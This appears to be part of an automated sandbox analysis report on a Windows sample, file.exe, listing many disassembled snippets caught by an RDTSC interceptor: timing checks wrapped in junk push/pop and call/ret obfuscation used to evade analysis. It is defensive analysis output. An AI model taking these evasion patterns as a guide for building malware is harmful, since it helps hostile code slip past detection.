              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49C31C second address: 49C327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49C327 second address: 49C338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB560E1BD56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E06C second address: 49E070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E162 second address: 49E166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E4DC second address: 49E4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E4E1 second address: 49E4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E4E7 second address: 49E4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E4EB second address: 49E4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E6F0 second address: 49E6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49E6F4 second address: 49E6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49ED57 second address: 49ED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB560E658D4h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1E3 second address: 49F1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F1E7 second address: 49F206 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB560E658C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f xchg eax, ebx 0x00000010 jl 00007FB560E658CAh 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F206 second address: 49F20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F20C second address: 49F215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49F677 second address: 49F690 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007FB560E1BD5Ch 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A0042 second address: 4A004C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB560E658C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49FEEE second address: 49FEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A110D second address: 4A1112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A26EA second address: 4A274E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB560E1BD5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f jmp 00007FB560E1BD62h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FB560E1BD58h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov esi, 512F2381h 0x00000035 mov edi, dword ptr [ebp+122D3B4Bh] 0x0000003b push eax 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FB560E1BD5Dh 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A3115 second address: 4A312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB560E658CFh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A312D second address: 4A3133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A3133 second address: 4A3137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A3CB1 second address: 4A3CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A4853 second address: 4A48A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FB560E658C6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FB560E658C8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b movsx edi, di 0x0000002e push 00000000h 0x00000030 cmc 0x00000031 mov esi, ebx 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB560E658D9h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A48A7 second address: 4A48AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A48AB second address: 4A48B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A48B1 second address: 4A48C5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB560E1BD58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A48C5 second address: 4A48CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A8824 second address: 4A88BD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E1BD58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FB560E1BD65h 0x00000013 jmp 00007FB560E1BD66h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FB560E1BD58h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 add edi, dword ptr [ebp+122D27D5h] 0x0000003a mov dword ptr [ebp+124710E1h], edi 0x00000040 push 00000000h 0x00000042 mov edi, 22602A4Ah 0x00000047 push 00000000h 0x00000049 sbb edi, 5EAD840Ah 0x0000004f mov dword ptr [ebp+122D28E1h], esi 0x00000055 push eax 0x00000056 jns 00007FB560E1BD75h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FB560E1BD67h 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A8A4F second address: 4A8A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A9A4C second address: 4A9A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB560E1BD56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AA81A second address: 4AA832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB560E658D4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A9A56 second address: 4A9A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AA832 second address: 4AA8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c xor di, 918Dh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB560E658C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FB560E658C8h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 or bx, 7CF2h 0x0000004e xchg eax, esi 0x0000004f jp 00007FB560E658D9h 0x00000055 jmp 00007FB560E658D3h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FB560E658CBh 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AA8BF second address: 4AA8C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AA8C5 second address: 4AA8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AA8C9 second address: 4AA8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AB89C second address: 4AB8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AD678 second address: 4AD721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB560E1BD66h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FB560E1BD70h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB560E1BD58h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d xor dword ptr [ebp+122D2F94h], edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FB560E1BD58h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov dword ptr [ebp+124645ECh], ebx 0x00000055 jmp 00007FB560E1BD5Dh 0x0000005a push 00000000h 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 jo 00007FB560E1BD56h 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AC836 second address: 4AC83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AD721 second address: 4AD75D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB560E1BD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB560E1BD62h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FB560E1BD6Ch 0x00000019 jmp 00007FB560E1BD66h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC8FD second address: 4AC903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC903 second address: 4AC907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC907 second address: 4AC91A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB560E658C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC91A second address: 4AC91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC91E second address: 4AC924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF761 second address: 4AF765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE8C7 second address: 4AE8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE8CE second address: 4AE8D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE8D3 second address: 4AE8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b ja 00007FB560E658C6h 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B07FB second address: 4B07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF8D7 second address: 4AF8E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB560E658C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B07FF second address: 4B0810 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FB560E1BD56h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2929 second address: 4B2947 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB560E658D9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B381F second address: 4B3826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3826 second address: 4B38B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FB560E658C8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movsx edi, ax 0x00000027 stc 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FB560E658C8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 sub dword ptr [ebp+1245D3C9h], edx 0x0000004a jmp 00007FB560E658CCh 0x0000004f push 00000000h 0x00000051 add ebx, 17C70BF7h 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jnp 00007FB560E658D7h 0x00000060 jmp 00007FB560E658D1h 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B38B5 second address: 4B38CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B38CF second address: 4B38D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1AD5 second address: 4B1ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5A0A second address: 4B5A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB560E658C6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5A15 second address: 4B5A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB560E1BD61h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2AAE second address: 4B2AB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3A43 second address: 4B3A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FB560E1BD56h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3A50 second address: 4B3A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4C4F second address: 4B4C54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7A2E second address: 4B7A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub ebx, 227E5100h 0x00000010 push 00000000h 0x00000012 and bx, 9E94h 0x00000017 push 00000000h 0x00000019 mov bl, 36h 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7A5E second address: 4B7A68 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7A68 second address: 4B7A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5613DF5AFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BAAFC second address: 4BAB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB560E14CE1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C05FB second address: 4C060C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C060C second address: 4C0618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB560E14CD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0618 second address: 4C061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C061C second address: 4C0642 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB560E14CE4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0642 second address: 4C0651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB5613DF5A6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0793 second address: 4C0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0797 second address: 4C07B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB5613DF5BAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C07B9 second address: 4C07C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB560E14CDAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C093F second address: 4C0962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0962 second address: 4C0970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14CDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0970 second address: 4C098F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB5613DF5B2h 0x00000008 jp 00007FB5613DF5A6h 0x0000000e jns 00007FB5613DF5A6h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007FB5613DF5A6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9A8C second address: 4C9AC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB560E14CDAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB560E14CE6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9AC1 second address: 4C9AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9C04 second address: 4C9C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
